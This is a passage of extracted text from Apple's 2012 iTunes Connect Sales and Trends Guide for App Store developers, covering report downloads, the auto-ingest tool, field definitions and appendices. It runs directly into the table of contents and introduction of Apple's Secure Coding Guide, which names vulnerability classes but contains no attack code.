App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 8Top Products Display The Top Products display is based on the period (specific day or week), category (iOS or Mac OS) and the type (Free Apps, Paid Apps, In Apps, Updates) selected. The section provides a summary of net units at the Product level. A Product can be reported as separate lines in your reports due to differences such as territories but will be reported as combined in terms of units in this display since the units are aggregated at the Product level world-wide based on unique product identifier. The “Change” column in the display shows units and percentage change from the prior period (selected day over same day of the prior week, or selected week over prior week). Top Markets Display The Top Markets display is based on the period (specific day or week), category (iOS and Mac OS) and the type (e.g. Free Apps) selected. This section provides a summary of net units for all products at the country (iTunes Storefront) level. The “Change” column in the display shows units and percentage change from the prior period (selected day over same day of the prior week, or selected week over prior week). See Appendix F for iTunes Storefront listing. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 9Resources At the bottom left of all pages you will find three links: ■ Fiscal Calendar - Opens a new window that displays Apple’s fiscal calendar ■ User Guide - Provides the most current version of this guide ■ Mobile Guide - Provides the user guide for the iTC Mobile Application. Done Button The “Done” button at the bottom right of all pages takes you to the Dashboard from the Sales view, and to the iTunes Connect Welcome page from the Dashboard. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 102.2. Sales View The Sales view allows you to analyze at the specific content level. You can preview the Top 50 products delivered based on transaction volume summarized and sorted descending by Units, and can download the available daily and weekly reports for additional information about all your transactions. You can also download detailed Newsstand reports or contact information for customers that have elected to “opt-in” when purchasing an In-App Purchase subscription. The following is an example of the Sales view. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 11Understanding The Sales Preview When you land on the Sales view, the Period presented is the latest daily data available. Using the Period Selection menu, you can preview all available daily and weekly data for all content types in all categories. Once you have selected a period, the Preview will be displayed. The Preview summarizes the data based on the columns displayed, including any promotional transactions indicated with (Promo Indicator). You can hover over the Promo Indicator to see the type of promotion. See Appendix G for Promotional Codes. Autorenewable subscription transactions are indicated with (Subscription Indicator). The preview functionality does not contain the full report. To view or analyze all transactions you must download the full reports. The previews summarize data differently than the reports based on the information available (i.e. the preview may summarize sales at a higher level as the downloaded report has more fields to consider). Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 123. Downloading, Reading and Understanding Sales and Trends Data 3.1. Downloading Reports You may download the Sales reports from the respective Sales view. To download a report (tab delimited zipped text file), you must select a report period (day of week or week ended) and press the download button to the right of the period selection menu. For a complete listing of fields please see Appendix A, B and M. If you are using Mac OS X the reports will automatically open when downloaded. If you are using a Windows OS you will need to download an application (for example WinZip) to decompress the “.gz” file prior to use. You can then import the tab delimited text file to a database or spreadsheet application (Numbers, MS Excel) and analyze or manipulate your data as needed. Weekly reports cover Monday through Sunday and are available on Mondays. The daily reports represent the 24 hour period in the time zone of the respective storefront (territory). Please refer to Appendix D for the definition of Day and Week. We do not store or regenerate the data after the periods have expired (14 rolling days and 13 rolling weeks); you will need to download and store this data on a regular basis if you intend to use it in the future. Downloading Customer Opt-In Information If your apps have auto-renewable subscriptions, you can download contact information for customers who have elected to “opt-in” to personal information sharing. To download the report (tab delimited zipped text file), you must select a weekly report period and click Opt-In Report next to Download Report. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 13To open the encrypted .zip file that is downloaded, you need to use the Opt-In Passkey. To obtain the Opt-In Passkey, click the Opt-In Passkey button in the upper right of the screen. The passkey will be displayed in a lightbox. Copy and paste this value to use it to unpack the .zip file and access the Opt-In Report. You will need to use a decompression tool like Stuff-It Expander or Winzip to open the encrypted file once you have downloaded it. Downloading Newsstand Reports If you have one or more Newsstand apps available for sale, you can download Newsstand reports by clicking Newsstand Detailed. Newsstand reports are also available via auto-ingest. 3.2. Auto-Ingest Tool Apple provides access to a Java based tool to allow you to automate the download of your iTunes Connect Sales and Trends reports. To use the auto-ingest tool, configuration on your part will be required. This tool allows you to automate the retrieval of: •Daily Summary Reports •Weekly Summary Reports •Opt-In Reports •Newsstand Reports As new reports become available we will modify and redeliver the java package or new parameters to use to download new products (i.e. we will modify the script for new features). We will communicate both the anticipated date of the report release and the date that the tool will be able to retrieve reports. You may not alter or disseminate the auto-ingest tool for any reason. We reserve the right to revoke access for usage or distribution beyond its intended use. Auto-Ingest Instructions You must have Java installed on the machine where you are running the auto-ingest tool. The tool will work as expected with Java version 1.6 or above. Follow the steps below to setup the environment for auto-ingestion: Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 141. Download and save the file Autoingestion.class to the directory where you want the reports delivered. http://www.apple.com/itunesnews/docs/Autoingestion.class.zip 2. To run the Java class file, change the command line directory to the directory where the class file is stored. 3. Invoke the following from the command line: java Autoingestion All items contained within “< >” are variable and will require you to define them. Of the 7 parameters only the date is optional. If you do not put a date in the parameter we will provide you the latest available report (the other parameters are mandatory). You will need to delimit the parameters with a space. Parameters Definitions Variable Value Notes username Your user name The user name you use to log into iTunes Connect password Your password The password you use to log into iTunes Connect vendorid 8####### (your unique number) Vendor ID for the entity which you want to download the report report_type Sales or Newsstand This is the report type you want to download. date_type Daily or Weekly Selecting Weekly will provide you the Weekly version of the report. Selecting Daily will provide you the Daily version of the report. report_subtype Summary, Detailed or Opt-In This is the parameter for the Sales Reports. Note: Detailed can only be used for Newsstand reports. Date (optional) YYYYMMDD This is the date of report you are requesting. If the value for Date parameter is not provided, you will get the latest report available. Example: You access iTunes Connect with user name “john@xyz.com” and your password is “letmein” for company 80012345, and you want to download a sales - daily - summary report for February 4, 2010. You will need to invoke the job by running the following command from the directory where the class file is stored: java Autoingestion john@xyz.com letmein 80012345 Sales Daily Summary 20100204 Newsstand Reports via Auto-Ingest If you are using auto-ingest, you can create the reports using the following auto-ingest parameters: Daily java Autoingestion Newsstand Daily Detailed java Autoingestion N D D java Autoingestion 5 2 1 Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 15Weekly java Autoingestion Newsstand Weekly Detailed java Autoingestion N W D java Autoingestion 5 1 1 3.3. Reading Reports Report File Names The file names for downloaded reports follow a standard naming convention. Please refer to the matrix below for details. Report Data Report Type Reporting Range Naming Convention Description Sales Summary Daily S_D__ Example: S_D_80000000_20111104 The first letter identifies that the report provides Sales data at a Summary level. Second letter denotes that it is a Daily report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD'). Sales Summary Weekly S_W__ Example: S_W_80000000_20111104 The first letter identifies that the report provides Sales data at a Summary level. Second letter denotes that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD'). Opt_in Summary Weekly O_S_W__ Example: O_S_W_80000000_20111104 The first and second letters identify that the report provides customer Opt-in data at a Summary level. The third letter identifies that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD'). Newsstand Detailed Daily N_D_D__ Example: N_D_D_80000000_20111104 The first and second letters identify that the report provides customer Newsstand data at a Detailed level. The third letter identifies that it is a Daily report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD'). Newsstand Detailed Weekly N_D_W__ Example: N_D_W_80000000_20111104 The first and second letters identify that the report provides customer Newsstand data at a Detailed level. The third letter identifies that it is a Weekly report. This is followed by the Vendor Account Number and the Date of reporting data ('YYYYMMDD'). Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 16Report Field Names All reports have a header row which contains the field names of each column. The reports present transactions that can be tracked with your SKU and/or the Apple Identifier. For a complete listing of fields please see Appendix A, B and M. Key Field Mapping The following table and screenshots will help you understand which fields in the report were setup by you in iTunes Connect and where they are in the App Store: Reference Field Name In Report Field in iTunes Connect Field in App Store 1 Developer Company Name Displayed after genre 2 Title App Name Displayed at top of product page 3 SKU SKU Number Not displayed on App Store Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 17Apple Identifier The Apple Identifier is the unique product identifier assigned by Apple. It is always included in each row of your sales reports. We recommend you provide the Apple Identifier of your app whenever you contact us for support so that your request can be expedited. You can also access the Apple Identifier by using the links in the App Store: The menu will offer an option for “Copy Link”. The link will look like the link below. The string of numbers highlighted is the Apple Identifier of the app. http://itunes.apple.com/us/app/remote/id284417350?mt=85 3.4. Understanding Units The reports are designed to provide valuable information about the activity of your product on the App Store. This can result in many lines for a given product. For each product with a unique Apple Identifier and SKU, units are split by: ■ Storefront / Country Code (US, UK) ■ Sales vs. Refunds ■ Product Type ■ Price ■ Promo Code ■ App Version Here are some examples of how units are grouped and displayed in both Preview and downloaded reports. Example 1: If you have one product and you are selling the product in the US, you will see 1 row (1 for US sales) assuming there are no refunds, price changes and promo codes during the period. Example 2: If you are selling 30 products in the US, and 10 of the products have refunds, then the preview and the downloaded report will have 40 rows and you will see a row for sales and a row for refunds. Example 3: If you are selling 30 products in the US, and 5 products have a price change in the middle of the week, then your full report and your previews will have 35 rows and you will see 2 lines per app with a price change. Example 4: If 10 new customers purchase your app and 10 existing customers update to the latest version of your app in the US, then your preview and downloaded report will have 1 row for purchases and 1 row for updates. Example 5: If 10 customers purchase version 1.1 of your product in the US, and those customers then update to version 1.2 of the same product, then your preview and downloaded report will have 2 rows, 1 row for purchases of version 1.1 and 1 row for updates to version 1.2. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 184. Contact Us If you have any questions or have difficulties viewing or downloading your sales and trends information, please do not hesitate to contact us. The easiest way to ensure your request is routed correctly is to use the Contact Us module. A Contact Us link is available on all pages as part of the footer. You can also find the Contact Us module on the iTunes Connect Homepage: The link will take you to a page that allows you to select the topic you need help with and will ask a series of questions and provide answers where available. For Sales and Trends inquiries, select the “Sales and Trends” topic. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 19Appendix A - Sales Report Field Definitions The definitions apply to Daily and Weekly Reports. Report Field Report Data Type Values Notes Provider CHAR(5) - APPLE Up to 5 Characters The service provider in your reports will typically be Apple Provider Country CHAR(2) - US Up to 2 Characters The service provider country code will typically be US SKU VARCHAR(100) Up to 100 Characters This is a product identifier provided by you when the app is set up ∇ Developer VARCHAR(4000) Up to 4000 Characters You provided this on initial setup . ∇ Title VARCHAR(600) Up to 600 Characters You provided this when setting up the app ∇ Version VARCHAR(100) Up to 100 Characters You provided this when setting up the app ∇ Product Type Identifier VARCHAR(20) Up to 20 Characters This field defines the type of transaction (e.g. initial download, update, etc) – See Appendix E Units DECIMAL(18,2) Up to 18 Characters This is the aggregated number of units Developer Proceeds (per item) DECIMAL(18,2) Up to 18 Characters Your proceeds for each item delivered Begin Date Date Date in MM/DD/YYYY Date of beginning of report End Date Date Date in MM/DD/YYYY Date of end of report Customer Currency CHAR(3) Up to 3 Characters Three character ISO code indicates the currency the customer paid in - See Appendix H Country Code CHAR(2) Up to 2 Characters Two character ISO country code indicates what App Store the purchase occurred in – See Appendix F Currency of Proceeds CHAR(3) Up to 3 Characters Currency your proceeds are earned in – See Appendix H Apple Identifier DECIMAL(18,0) Up to 18 Characters This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier. Customer Price DECIMAL(18,2) Up to 18 Characters Retail Price displayed on the App Store and charged to the customer. Promo Code VARCHAR(10) Up to 10 Characters If the transaction was part of a promotion this field will contain a value. For all non-promotional items this field will be blank - See Appendix G Parent Identifier VARCHAR(100) Up to 100 Characters For In-App Purchases this will be populated with the SKU from the originating app. Subscription VARCHAR(10) Up to 10 Characters This field defines whether an autorenewable subscription purchase is a new purchase or a renewal. See Appendix I. Period VARCHAR(30) Up to 30 Characters This field defines the duration of an auto-renewable subscription purchase. See Appendix I. ∇ Apple generally does not modify this field. What you provided when setting up your app is passed through on the report. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 20Appendix B - Opt-In Report Field Definitions The definitions apply to Weekly Opt-In Reports. Report Field Report Data Type Values Notes First Name VARCHAR(100) Up to 100 Characters First Name of Customer Last Name VARCHAR(100) Up to 100 Characters Last Name of Customer Email Address VARCHAR(100) Up to 100 Characters Email Address of Customer Postal Code VARCHAR(50) Up to 50 Characters Postal Code of Customer Apple Identifier DECIMAL(18,0) Up to 18 Characters This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier. Report Start Date DATE Date in MM/DD/YYYY Date of beginning of report Report End Date DATE Date in MM/DD/YYYY Date of end of report Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 21Appendix C - Apple Fiscal Calendar Monthly Financial Reports are based on Apple’s reporting calendar shown below. Months represent either four (4) or five (5) weeks (the first month of each quarter has an extra week) and the weeks run from Sunday through Saturday. All months start on Sunday and end on Saturday. Monthly reports are also distributed on iTunes Connect and available based on the contractually agreed timeframes. Sales and Trends reports are generated using different time frames and represent near immediate feedback of transactions. Finance Reports are based on customer invoicing and financial processing. Reconciliation between the reports is not recommended due to the timing and reporting differences. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 22Appendix D - Definition of Day and Week What is a Day? 12:00:00 AM to 11:59:59 PM in the time zone used for that territory (see table below). What is a Week? Monday 12:00:00 AM to Sunday 11:59:59 PM What time is the report date based on? Territory Time Zone US, Canada, Latin America Pacific Time (PT) Europe, Middle East, Africa, Asia Pacific Central Europe Time (CET) Japan Japan Standard Time (JST) Australia, New Zealand Western Standard Time (WST) When are reports available? Reports are generated after the close of business in the final time zone (which is PT). As such, all reports are generally available by 8:00 AM PT for the prior day or week. Earlier access to reporting for other time zones (where the close of business is earlier) is not available. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 23Appendix E – Product Type Identifiers Product Type Identifier Type Description 1 Free or Paid Apps iPhone and iPod Touch, iOS 7 Updates iPhone and iPod Touch, iOS IA1 In Apps Purchase, iOS IA9 In Apps Subscription, iOS IAY In Apps Auto-Renewable Subscription, iOS IAC In Apps Free Subscription, iOS 1F Free or Paid Apps Universal, iOS 7F Updates Universal, iOS 1T Free or Paid Apps iPad, iOS 7T Updates iPad, iOS F1 Free or Paid Apps Mac OS F7 Updates Mac OS FI1 In Apps Mac OS 1E Paid Apps Custom iPhone and iPod Touch, iOS 1EP Paid Apps Custom iPad, iOS 1EU Paid Apps Custom Universal, iOS Dashboard Types Type Product Type Identifier Description Free Apps 1, 1F, 1T, F1 Where price = ‘0’ Paid Apps 1, 1F, 1T, F1 Where price > ‘0’ In Apps IA1, IA9, IAY. FI1 Updates 7, 7F, 7T, F7 Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 24Appendix F – Country Codes Country Code Country Name Country Code Country Name Country Code Country Name AE United Arab Emirates GD Grenada NG Nigeria AG Antigua and Barbuda GH Ghana NI Nicaragua AI Anguilla GR Greece NL Netherlands AM Armenia GT Guatemala NO Norway AO Angola GY Guyana NZ New Zealand AR Argentina HK Hong Kong OM Oman AT Austria HN Honduras PA Panama AU Australia HR Croatia PE Peru AZ Azerbaijan HU Hungary PH Philippines BB Barbados ID Indonesia PK Pakistan BE Belgium IE Ireland PL Poland BG Bulgaria IL Israel PT Portugal BH Bahrain IN India PY Paraguay BM Bermuda IS Iceland QA Qatar BN Brunei IT Italy RO Romania BO Bolivia JM Jamaica RU Russia BR Brazil JO Jordan SA Saudi Arabia BS Bahamas JP Japan SE Sweden BW Botswana KE Kenya SG Singapore BY Belarus KN St. Kitts and Nevis SI Slovenia BZ Belize KR Republic Of Korea SK Slovakia CA Canada KW Kuwait SN Senegal CH Switzerland KY Cayman Islands SR Suriname CL Chile KZ Kazakstan SV El Salvador CN China LB Lebanon TC Turks and Caicos CO Colombia LC St. Lucia TH Thailand CR Costa Rica LK Sri Lanka TN Tunisia CY Cyprus LT Lithuania TR Turkey CZ Czech Republic LU Luxembourg TT Trinidad and Tobago DE Germany LV Latvia TW Taiwan DK Denmark MD Republic Of Moldova TZ Tanzania DM Dominica MG Madagascar UG Uganda DO Dominican Republic MK Macedonia US United States DZ Algeria ML Mali UY Uruguay EC Ecuador MO Macau UZ Uzbekistan EE Estonia MS Montserrat VC St. Vincent and The Grenadines EG Egypt MT Malta VE Venezuela ES Spain MU Mauritius VG British Virgin Islands FI Finland MX Mexico VN Vietnam FR France MY Malaysia YE Yemen GB United Kingdom NE Niger ZA South Africa Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 25Appendix G – Promotional Codes The promo code field contains different values depending on the type of promotion. The following definitions describe the possible values that may appear in the field other than null (null means the item is a standard transaction). Only one value is possible per line in the report: Promo Code Description CR - RW Promotional codes where the proceeds have been waived (The customer price will be 0 and the proceeds will be 0). These transactions are the result of iTunes Connect Developer Code redemptions. GP Purchase of a Gift by the giver GR Redemption of a Gift by the receiver EDU Education Store transaction Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 26Appendix H – Currency Codes Currency Code Currency Country AUD Australian Dollar CAD Canadian Dollar CHF Swiss Franc DKK Danish Kroner EUR European Euro GBP British Pound JPY Japanese Yen MXN Mexican Peso NOK Norwegian Kroner NZD New Zealand Dollar SEK Swedish Kronor USD United States Dollar Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 27Appendix I - Subscription and Period Field Values The Subscription field indicates whether the auto-renewable subscription purchase is a new purchase or a renewal. Subscription Field Value New Renewal The Period field indicates the duration of the auto-renewable subscription purchase or renewal. Period Field Value 7 Days 1 Month 2 Months 3 Months 6 Months 1 Year Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 28Appendix J - FAQs What does each column represent in my reports? Please refer to Appendix A and B. I am seeing differences between Financial Reports and Sales and Trends reports, why? The daily and weekly reports are based on customer interaction (clicks) and are coming from real-time systems while the monthly reports are based on settled financial transactions and are coming from our financial systems. There are intentional differences in processing and time-frames between those two types of reports. For example, the weekly reports are from Monday to Sunday, while the Financial Reports are based on the Apple Fiscal Calendar and always end on Saturday. Reconciliation between the reports is not recommended due to the timing and reporting differences. Do weekly reports reconcile with the daily reports? Yes. Both daily and weekly reports are coming from the same system and they are based on customer interaction (clicks). They will reconcile. I see a high volume of sales for a short period of time (could be up to a week) and the sales drop down, what does this mean? It is very common that some items get a high amount of sales for a short period of time and the numbers get back to normal. It is generally due to a particular promotion related with a web blog or a sales campaign that includes an item that might be associated with iTunes or the content. There is also a very common case where a content's sales drop to zero.  In this case, this might be an indication of content being unavailable in iTunes due to number of reasons. I don’t see any sales for a particular item, why? This can be an indication of an item not being available in the store for different reasons. Check the product availability in iTunes Connect and ensure that the latest contracts are agreed to and in place. How can I identify refunds? Sales and Trends reports expose refunds to allow you to monitor refund rate by product. You will see a negative unit value for refund transactions. Why there are refunds on my reports? We will provide a refund if the customer experience was in our opinion unsatisfactory (generally quality issues). One thing you can monitor on your reports is the rate of refunds and the content that is refunded since it is an indication of quality issues with your content. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 29Appendix K - Sample Sales Report The following is a sample Sales report to help you interpret its contents. Price fields are dependent on the storefront 1 from which the customer purchases the app, and the price of the app at the time of purchase 2 . (For complete field definitions see Appendix A) Reading the Report The example above is the most likely scenario you will see: ■ SKU – “SKU1” is the SKU attached to this app by the developer. ■ Developer – “Vendor” is the name that the app is sold under on the store ■ Title – “App-1” is the name of the app ■ Product Type Identifier – “1” denotes the type of transaction (initial download) ■ Units – “352” is the number of units sold for a given day/week ■ Developer Proceeds – “3.65” is proceeds, net of commission, you will receive for each sale of the app ■ Customer Currency – “GBP” (Great Britain Pounds) is the currency in which the customer purchased the app ■ Currency of Proceeds – “GBP” (Great Britain Pounds) is the currency in which your proceeds were earned for the app ■ Customer Price – “5.99” is the price paid by the customer for the app Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 30 1 As new territories are added, storefronts will further differentiate records 2 If you change your price during the reporting period, the report will show multiple price points for the same countryAdditional Reporting Scenarios We have provided some additional scenarios and sample extract to help you further understand your reports. In your reports the Product Type Identifier denotes the type of transaction (See Appendix E for a list of all types). The Product Type Identifier must be taken into account in all of the following scenarios. Scenario 1 (Product Type Identifier=1; Units=16; Developer Proceeds=4.86) This is similar to the first line; the Developer Proceeds value will always be greater than zero for all paid apps and zero for free apps. Scenario 2 (Product Type Identifier=7; Units=1; Developer Proceeds=0) Certain line items will have 0 in the Developer Proceeds field. Even if you only have paid apps on the store, the Developer Proceeds will be 0 for all updates (Product Type Identifier = 7). Scenario 3 (Product Type Identifier=1; Units=-1; Developer Proceeds=7; Customer Price=-9.99) You may see negative units when a customer returns a product. All returns will have a Product Type Identifier of 1 and both Units and Customer Price will be a negative value. Refer to Appendix J for additional information on returns. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 31Appendix L – Other Uses Below you will see some sample ideas that the data can be used for on a daily basis. 1. Business Health Monitoring By tracking volume of sales per unit or revenue, the health of your business can be tracked. Sudden drop in sales may indicate issues such as top seller being not available any more. 2. Content Quality Issues By tracking the refunds, you can identify and replace the asset that is being refunded to the customer if the refunds are specific to one or more items. Typical ratio of refunds to overall sales shall not exceed 0.10%. 3. Pricing Issues When organizations get larger, it is always challenging to have fast/efficient communication between the operational teams that are providing the metadata to iTunes and the Management, Marketing, Finance and Business Development team. Tracking pricing will indicate any disconnect between different groups and will provide opportunity to fix issues sooner and minimize the impact. 4. Price Elasticity We believe that careful management of price can increase your sales. By using the reports you can monitor percent change in sales in correlation with a percent change in customer price. If applied correctly this type of analysis will help you set the best price for your product to maximize your revenue. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 32Appendix M - Newsstand Report Field Definitions The definitions apply to Newsstand reports. Report Field Report Data Type Values Notes Provider CHAR(5) - APPLE Up to 5 Characters The service provider in your reports will typically be Apple Provider Country CHAR(2) - US Up to 2 Characters The service provider country code will typically be US SKU VARCHAR(100) Up to 100 Characters This is a product identifier provided by you when the app is set up Developer VARCHAR(4000) Up to 4000 Characters You provided this on initial setup. Title VARCHAR(600) Up to 600 Characters You provided this when setting up the app Version VARCHAR(100) Up to 100 Characters You provided this when setting up the app Product Type Identifier VARCHAR(20) Up to 20 Characters This field defines the type of transaction (e.g. initial download, update, etc) – See Appendix E Units DECIMAL(18,2) Up to 18 Characters This is the aggregated number of units Developer Proceeds (per item) DECIMAL(18,2) Up to 18 Characters Your proceeds for each item delivered Customer Currency CHAR(3) Up to 3 Characters Three character ISO code indicates the currency the customer paid in - See Appendix H Country Code CHAR(2) Up to 2 Characters Two character ISO country code indicates what App Store the purchase occurred in – See Appendix F Currency of Proceeds CHAR(3) Up to 3 Characters Currency your proceeds are earned in – See Appendix H Apple Identifier DECIMAL(18,0) Up to 18 Characters This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier. Customer Price DECIMAL(18,2) Up to 18 Characters Retail Price displayed on the App Store and charged to the customer. Promo Code VARCHAR(10) Up to 10 Characters If the transaction was part of a promotion this field will contain a value. For all non-promotional items this field will be blank - See Appendix G Parent Identifier VARCHAR(100) Up to 100 Characters For In-App Purchases this will be populated with the SKU from the originating app. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 33Subscription VARCHAR(10) Up to 10 Characters This field defines whether an auto-renewable subscription purchase is a new purchase or a renewal. See Appendix I. Period VARCHAR(30) Up to 30 Characters This field defines the duration of an auto-renewable subscription purchase. See Appendix I. Download Date (PST) TIMESTAMP(0) Date in MM/DD/YYYY Download Date Customer Identifier DECIMAL(18,0) Up to 18 Characters Customer Identification Report Date (Local) DATE Date in MM/DD/YYYY Report Date Sales/Return CHAR(1) Up to 1 character S or R; R is always a refund, R is not a reversal Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 34 Secure Coding GuideContents Introduction to Secure Coding Guide 7 At a Glance 7 Hackers, Crackers, and Attackers 7 No Platform Is Immune 8 How to Use This Document 9 See Also 10 Types of Security Vulnerabilities 11 Buffer Overflows 11 Unvalidated Input 12 Race Conditions 13 Interprocess Communication 13 Insecure File Operations 13 Access Control Problems 14 Secure Storage and Encryption 15 Social Engineering 16 Avoiding Buffer Overflows and Underflows 17 Stack Overflows 18 Heap Overflows 20 String Handling 22 Calculating Buffer Sizes 25 Avoiding Integer Overflows and Underflows 27 Detecting Buffer Overflows 28 Avoiding Buffer Underflows 29 Validating Input and Interprocess Communication 33 Risks of Unvalidated Input 33 Causing a Buffer Overflow 33 Format String Attacks 34 URLs and File Handling 36 Code Insertion 37 Social Engineering 37 Modifications to Archived Data 38 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 2Fuzzing 39 Interprocess Communication and Networking 40 Race Conditions and Secure File Operations 43 Avoiding Race Conditions 43 Time of Check Versus Time of Use 44 Signal Handling 46 Securing Signal Handlers 46 Securing File Operations 47 Check Result Codes 47 Watch Out for Hard Links 48 Watch Out for Symbolic Links 49 Case-Insensitive File Systems Can Thwart Your Security Model 49 Create Temporary Files Correctly 50 Files in Publicly Writable Directories Are Dangerous 51 Other Tips 57 Elevating Privileges Safely 59 Circumstances Requiring Elevated Privileges 59 The Hostile Environment and the Principle of Least Privilege 60 Launching a New Process 61 Executing Command-Line Arguments 61 Inheriting File Descriptors 61 Abusing Environment Variables 62 Modifying Process Limits 62 File Operation Interference 63 Avoiding Elevated Privileges 63 Running with Elevated Privileges 63 Calls to Change Privilege Level 64 Avoiding Forking Off a Privileged Process 65 authopen 65 launchd 66 Limitations and Risks of Other Mechanisms 67 Factoring Applications 69 Example: Preauthorizing 69 Helper Tool Cautions 71 Authorization and Trust Policies 72 Security in a KEXT 72 Designing Secure User Interfaces 73 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 3 ContentsUse Secure Defaults 73 Meet Users’ Expectations for Security 74 Secure All Interfaces 75 Place Files in Secure Locations 75 Make Security Choices Clear 76 Fight Social Engineering Attacks 78 Use Security APIs When Possible 79 Designing Secure Helpers and Daemons 81 Avoid Puppeteering 81 Use Whitelists 82 Use Abstract Identifiers and Structures 82 Use the Smell Test 83 Treat Both App and Helper as Hostile 83 Run Daemons as Unique Users 84 Start Other Processes Safely 84 Security Development Checklists 86 Use of Privilege 86 Data, Configuration, and Temporary Files 88 Network Port Use 89 Audit Logs 91 Client-Server Authentication 93 Integer and Buffer Overflows 97 Cryptographic Function Use 97 Installation and Loading 98 Use of External Tools and Libraries 100 Kernel Security 101 Third-Party Software Security Guidelines 103 Respect Users’ Privacy 103 Provide Upgrade Information 103 Store Information in Appropriate Places 103 Avoid Requiring Elevated Privileges 104 Implement Secure Development Practices 104 Test for Security 104 Helpful Resources 105 Document Revision History 106 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 4 ContentsGlossary 107 Index 110 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 5 ContentsFigures, Tables, and Listings Avoiding Buffer Overflows and Underflows 17 Figure 2-1 Schematic view of the stack 19 Figure 2-2 Stack after malicious buffer overflow 20 Figure 2-3 Heap overflow 21 Figure 2-4 C string handling functions and buffer overflows 22 Figure 2-5 Buffer overflow crash log 29 Table 2-1 String functions to use and avoid 23 Table 2-2 Avoid hard-coded buffer sizes 25 Table 2-3 Avoid unsafe concatenation 26 Race Conditions and Secure File Operations 43 Table 4-1 C file functions to avoid and to use 55 Elevating Privileges Safely 59 Listing 5-1 Non-privileged process 70 Listing 5-2 Privileged process 71 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 6Secure coding is the practice of writing programs that are resistant to attack by malicious or mischievous people or programs. Secure coding helps protect a user’s data from theft or corruption. In addition, an insecure program can provide accessfor an attacker to take control of a server or a user’s computer, resulting in anything from a denial of service to a single user to the compromise of secrets, loss of service, or damage to the systems of thousands of users. Secure coding is important for all software; if you write any code that runs on Macintosh computers or on iOS devices, from scripts for your own use to commercial software applications, you should be familiar with the information in this document. At a Glance Every program is a potential target. Attackers will try to find security vulnerabilities in your applications or servers. They will then try to use these vulnerabilities to steal secrets, corrupt programs and data, and gain control of computer systems and networks. Your customers’ property and your reputation are at stake. Security is notsomething that can be added to software as an afterthought; just as a shed made out of cardboard cannot be made secure by adding a padlock to the door, an insecure tool or application may require extensive redesign to secure it. You must identify the nature of the threats to your software and incorporate secure coding practices throughout the planning and development of your product. This chapter explains the types of threatsthat yoursoftware may face. Other chaptersin this document describe specific types of vulnerabilities and give guidance on how to avoid them. Hackers, Crackers, and 